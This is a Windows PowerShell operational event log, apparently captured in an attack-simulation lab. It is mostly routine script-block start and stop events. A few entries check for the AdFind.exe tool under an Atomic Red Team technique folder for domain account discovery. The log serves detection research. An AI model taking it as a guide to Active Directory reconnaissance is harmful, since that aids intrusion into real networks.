Message=Completed invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478635
Keywords=None
Message=Started invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478634
Keywords=None
Message=Completed invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478633
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478632
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478631
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478630
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478629
Keywords=None
Message=Started invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478628
Keywords=None
Message=Started invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478627
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478626
Keywords=None
Message=Started invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478625
Keywords=None
Message=Completed invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478624
Keywords=None
Message=Completed invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478623
Keywords=None
Message=Started invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478622
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478621
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478620
Keywords=None
Message=Started invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478619
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478618
Keywords=None
Message=Completed invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478617
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478616
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478615
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478614
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478613
Keywords=None
Message=Started invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478612
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478611
Keywords=None
Message=Started invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478610
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478609
Keywords=None
Message=Started invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478608
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478607
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478606
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478605
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478604
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478603
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478602
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478601
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478600
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478599
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478598
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478597
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478596
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478595
Keywords=None
Message=Started invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478594
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478593
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478858
Keywords=None
Message=Completed invocation of ScriptBlock ID: 923c064a-7e94-489b-ac4a-ce13e0c22e1e
Runspace ID: c66a8192-bebf-4b74-ad75-81d05079fd1c
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478857
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ce1298f-beaa-47d4-8ab1-cab65679afc8
Runspace ID: c66a8192-bebf-4b74-ad75-81d05079fd1c
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478856
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4ab25c01-75dc-471e-b85b-32bf9e8a44e3
Runspace ID: c66a8192-bebf-4b74-ad75-81d05079fd1c
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478855
Keywords=None
Message=Started invocation of ScriptBlock ID: 4ab25c01-75dc-471e-b85b-32bf9e8a44e3
Runspace ID: c66a8192-bebf-4b74-ad75-81d05079fd1c
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478854
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ce1298f-beaa-47d4-8ab1-cab65679afc8
Runspace ID: c66a8192-bebf-4b74-ad75-81d05079fd1c
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478853
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{if (Test-Path C:\AtomicRedTeam\atomics\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}}

ScriptBlock ID: 1ce1298f-beaa-47d4-8ab1-cab65679afc8
Path:
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478852
Keywords=None
Message=Started invocation of ScriptBlock ID: 923c064a-7e94-489b-ac4a-ce13e0c22e1e
Runspace ID: c66a8192-bebf-4b74-ad75-81d05079fd1c
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478851
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {if (Test-Path C:\AtomicRedTeam\atomics\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}}

ScriptBlock ID: 923c064a-7e94-489b-ac4a-ce13e0c22e1e
Path:
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478850
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478849
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 7256 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478848
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478847
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
